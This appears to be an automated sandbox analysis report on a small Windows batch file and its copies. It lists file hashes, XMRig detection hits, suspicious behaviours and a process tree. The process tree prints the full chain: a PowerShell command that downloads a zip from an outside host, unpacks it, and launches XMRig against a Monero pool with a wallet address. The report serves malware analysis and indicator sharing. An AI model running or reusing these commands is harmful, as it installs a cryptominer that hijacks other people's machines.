Overview
overview
10Static
static
1tesy - Copy (10).bat
windows10-1703-x64
10tesy - Copy (11).bat
windows10-1703-x64
10tesy - Copy (12).bat
windows10-1703-x64
10tesy - Copy (13).bat
windows10-1703-x64
10tesy - Copy (14).bat
windows10-1703-x64
10tesy - Copy (2).bat
windows10-1703-x64
10tesy - Copy (3).bat
windows10-1703-x64
10tesy - Copy (4).bat
windows10-1703-x64
10tesy - Copy (5).bat
windows10-1703-x64
10tesy - Copy (6).bat
windows10-1703-x64
10tesy - Copy (7).bat
windows10-1703-x64
10tesy - Copy (8).bat
windows10-1703-x64
10tesy - Copy (9).bat
windows10-1703-x64
10tesy - Copy.bat
windows10-1703-x64
10tesy.bat
windows10-1703-x64
10Analysis
-
max time kernel
1825s -
max time network
1837s -
platform
windows10-1703_x64 -
resource
win10-20230915-en -
resource tags
arch:x64arch:x86image:win10-20230915-enlocale:en-usos:windows10-1703-x64system -
submitted
14-10-2023 06:30
Static task
static1
Behavioral task
behavioral1
Sample
tesy - Copy (10).bat
Resource
win10-20230915-en
Behavioral task
behavioral2
Sample
tesy - Copy (11).bat
Resource
win10-20230915-en
Behavioral task
behavioral3
Sample
tesy - Copy (12).bat
Resource
win10-20230915-en
Behavioral task
behavioral4
Sample
tesy - Copy (13).bat
Resource
win10-20230915-en
Behavioral task
behavioral5
Sample
tesy - Copy (14).bat
Resource
win10-20230915-en
Behavioral task
behavioral6
Sample
tesy - Copy (2).bat
Resource
win10-20230915-en
Behavioral task
behavioral7
Sample
tesy - Copy (3).bat
Resource
win10-20230915-en
Behavioral task
behavioral8
Sample
tesy - Copy (4).bat
Resource
win10-20230915-en
Behavioral task
behavioral9
Sample
tesy - Copy (5).bat
Resource
win10-20230915-en
Behavioral task
behavioral10
Sample
tesy - Copy (6).bat
Resource
win10-20230915-en
Behavioral task
behavioral11
Sample
tesy - Copy (7).bat
Resource
win10-20230915-en
Behavioral task
behavioral12
Sample
tesy - Copy (8).bat
Resource
win10-20230915-en
Behavioral task
behavioral13
Sample
tesy - Copy (9).bat
Resource
win10-20230915-en
Behavioral task
behavioral14
Sample
tesy - Copy.bat
Resource
win10-20230915-en
General
-
Target
tesy - Copy (2).bat
-
Size
702B
-
MD5
65f016a2abe40d2902c7032438a14bd7
-
SHA1
b3537668ca1bb826e5085aee38b3f7ec654d606e
-
SHA256
153b384b64bd371e0236c8497c9706db00cc102f068ea8fd4569d20b3b5a6fd8
-
SHA512
b52486cdc585277de12287b4b2ab17c9e401bfeaee78555fd6d8760d7954b4e361f6e3ec32e4d694ba2cfa69d3d843d0f192539f0c893500b801c05a13b488f7
Malware Config
Extracted
https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip
Signatures
-
XMRig Miner payload 64 IoCs
resource yara_rule behavioral6/files/0x000600000001afd2-103.dat family_xmrig behavioral6/files/0x000600000001afd2-103.dat xmrig behavioral6/memory/4816-105-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-107-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-108-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-111-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-114-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-115-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-116-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-117-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-118-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-119-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-120-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-121-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-122-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-123-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-124-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-125-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-126-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-127-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-128-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-129-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-130-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-131-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-132-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-133-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-134-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-135-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-136-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-137-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-138-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-139-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-140-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-141-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-142-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-143-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-144-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-145-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-146-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-147-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-148-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-149-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-150-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-151-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-152-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-153-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-154-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-155-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-156-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-157-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-158-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-159-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-160-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-161-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-162-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-163-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-164-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-165-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-166-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-167-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-168-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-169-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-170-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig behavioral6/memory/4816-171-0x00007FF7C5C50000-0x00007FF7C6753000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
flow pid Process 3 1332 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 4816 xmrig.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 1332 powershell.exe 1332 powershell.exe 1332 powershell.exe 3012 powershell.exe 3012 powershell.exe 3012 powershell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 640 Process not Found -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1332 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeLockMemoryPrivilege 4816 xmrig.exe Token: SeLockMemoryPrivilege 4816 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4816 xmrig.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 3060 wrote to memory of 1332 3060 cmd.exe 71 PID 3060 wrote to memory of 1332 3060 cmd.exe 71 PID 3060 wrote to memory of 3012 3060 cmd.exe 72 PID 3060 wrote to memory of 3012 3060 cmd.exe 72 PID 3060 wrote to memory of 4376 3060 cmd.exe 73 PID 3060 wrote to memory of 4376 3060 cmd.exe 73 PID 4376 wrote to memory of 4816 4376 cmd.exe 75 PID 4376 wrote to memory of 4816 4376 cmd.exe 75
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\tesy - Copy (2).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.nest.rip/uploads/e341541c-6dbc-49ac-8012-0432383c9453.zip', 'test.zip')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1332
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'test.zip' -DestinationPath '.'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3012
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K start.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Users\Admin\AppData\Local\Temp\xmrig-6.20.0\xmrig.exexmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 42BWpXvTvDbHpMyHrnjqBA5bqjnB9z65fGakJV9dQuHSS7pRkpoyx5T4vE4pUjJxPoPrLCAerjoKwdMTQKZNNEqo6zoLmPJ.TRI -p x3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4816
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD556efdb5a0f10b5eece165de4f8c9d799
SHA1fa5de7ca343b018c3bfeab692545eb544c244e16
SHA2566c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
SHA51291e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
-
Filesize
1KB
MD5f73558e813e5ce298c5a4a2d5f7057ef
SHA1e03d22788da00ba4bd13dbc6903b05420b943126
SHA256339aa9f41c074e9bf1495533ce4ca699f2f62fea24dc3ef8f4ca3e2f3e9f737a
SHA512ef5eee8e38493dec237397dc4f19926d36ff8b85d59555ecd973275988856a758e89c9283f0dd009986dab701eb78f9aebc0f988a0ad12d846794508044bf6f8
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3.2MB
MD53238c0d25d84b6f0bb645bbb29cdbf61
SHA111ae550c8a82c0793862c366b92072ad7e18befe
SHA256b7a3d27640d4a7403c306a61996d604f28c44c2267eb9d60ed770ad40b3b5dfb
SHA512d5c3e51f36b05ed6b66d501936fc771b712929fa9cdcb3e784d64e018ce4f081cead7a80c48504ced2f7b375bdcc94e147be1fc4e566af45ddaeb60389dee556
-
Filesize
170B
MD578657df2e34e338ff135d3dde69177bf
SHA1d5048a4270b7ba599e941d26d61bfa2e8da31fce
SHA2569004d356a2f71e3abd655983967aa597e81a8133069ee8bcef04f6ed0b36ae98
SHA512f05cd30046793f60d8afd61b0a83f53d0c8e2889a03cbace1b199de181257771d257ab47f29effd1084c196eba9454ccdd97715e6f1062c079f4087685bd7004
-
Filesize
7.9MB
MD54813fa6d610e180b097eae0ce636d2aa
SHA11e9cd17ea32af1337dd9a664431c809dd8a64d76
SHA2569ef2e8714e85dcd116b709894b43babb4a0872225ae7363152013b7fd1bc95bc
SHA5125463e61b9583dd7e73fc4c0f14252ce06bb1b24637fdf5c4b96b3452cf486b147c980e365ca6633d89e7cfe245131f528a7ecab2340251cef11cdeb49dac36aa